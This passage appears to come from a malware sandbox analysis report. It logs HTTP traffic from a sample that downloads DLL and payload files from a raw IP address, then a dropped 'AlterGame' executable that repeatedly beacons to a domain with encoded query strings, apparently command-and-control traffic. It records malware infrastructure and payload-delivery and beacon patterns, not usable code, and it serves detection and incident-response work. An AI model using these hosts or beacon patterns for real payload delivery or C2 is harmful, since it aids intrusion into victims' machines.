                                                                Date: Wed, 20 Nov 2024 04:02:16 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Length: 21
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                                Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                                Nov 20, 2024 05:02:17.378061056 CET | 224 | IN | HTTP/1.1 200 OK
                                                                Date: Wed, 20 Nov 2024 04:02:16 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Length: 21
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                                Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                                Nov 20, 2024 05:02:17.378088951 CET | 224 | IN | HTTP/1.1 200 OK
                                                                Date: Wed, 20 Nov 2024 04:02:16 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Length: 21
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                                Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                                Nov 20, 2024 05:02:17.387880087 CET | 393 | OUT | GET /dll/download HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                User-Agent: 1
                                                                Host: 185.156.72.65
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Nov 20, 2024 05:02:17.857040882 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                Date: Wed, 20 Nov 2024 04:02:17 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                                Content-Length: 97296
                                                                Keep-Alive: timeout=5, max=98
                                                                Connection: Keep-Alive
                                                                Content-Type: application/octet-stream
                                                                Nov 20, 2024 05:02:18.122930050 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                User-Agent: C
                                                                Host: 185.156.72.65
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Nov 20, 2024 05:02:18.980966091 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                Date: Wed, 20 Nov 2024 04:02:18 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Disposition: attachment; filename="ONE.file";
                                                                Content-Length: 4065622
                                                                Keep-Alive: timeout=5, max=97
                                                                Connection: Keep-Alive
                                                                Content-Type: application/octet-stream


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                1 | 192.168.2.4 | 49731 | 185.156.72.65 | 80 | 6556 | C:\Users\user\Desktop\file.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:02:24.920368910 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                User-Agent: C
                                                                Host: 185.156.72.65
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Nov 20, 2024 05:02:25.673360109 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                Date: Wed, 20 Nov 2024 04:02:25 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Disposition: attachment; filename="PAB1.file";
                                                                Content-Length: 4608
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: application/octet-stream
                                                                Nov 20, 2024 05:02:27.985363007 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                User-Agent: C
                                                                Host: 185.156.72.65
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Nov 20, 2024 05:02:28.314224005 CET | 203 | IN | HTTP/1.1 200 OK
                                                                Date: Wed, 20 Nov 2024 04:02:28 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Length: 1
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 30
                                                                Data Ascii: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                2 | 192.168.2.4 | 49858 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:18.590806007 CET | 314 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31df92d8838ed12a666d307eca743ec4c2b07b529669238658ef814c4ef90 HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:19.330084085 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:19.441055059 CET | 314 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31df92d8838ed12a666d307eca743ec4c2b07b529669238658ef814c4ef90 HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:19.707802057 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Nov 20, 2024 05:03:19.707851887 CET | 16 | IN | Data Raw: 31 66 62 61 32 31 61 66 62 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1fba21afb0
                                                                Nov 20, 2024 05:03:22.379276037 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:22.679676056 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                3 | 192.168.2.4 | 49885 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:22.806027889 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:23.511003017 CET | 1108 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                4 | 192.168.2.4 | 49892 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:23.633956909 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:24.349406958 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:24 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                5 | 192.168.2.4 | 49898 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:24.477838039 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:25.182888985 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                6 | 192.168.2.4 | 49904 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:25.310781002 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:26.013364077 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                7 | 192.168.2.4 | 49910 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:26.258687019 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:26.982481003 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                8 | 192.168.2.4 | 49917 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:27.111489058 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:27.814490080 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:27.925499916 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:28.175709963 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                9 | 192.168.2.4 | 49927 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:28.303901911 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:29.002851963 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                10 | 192.168.2.4 | 49933 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:29.211000919 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:29.864598036 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                11 | 192.168.2.4 | 49939 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:30.277796984 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:30.897241116 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:31.035603046 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:31.290525913 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                12 | 192.168.2.4 | 49945 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:31.415579081 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:32.129146099 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:32.238684893 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:32.485069990 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49956 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49962 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49968 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49974 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49980 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49991 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49999 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 50004 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 50011 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 50017 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 50023 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 50028 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 50029 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 50030 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:45.134144068 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:45.841032982 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                27 | 192.168.2.4 | 50031 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:45.962088108 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:46.665491104 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
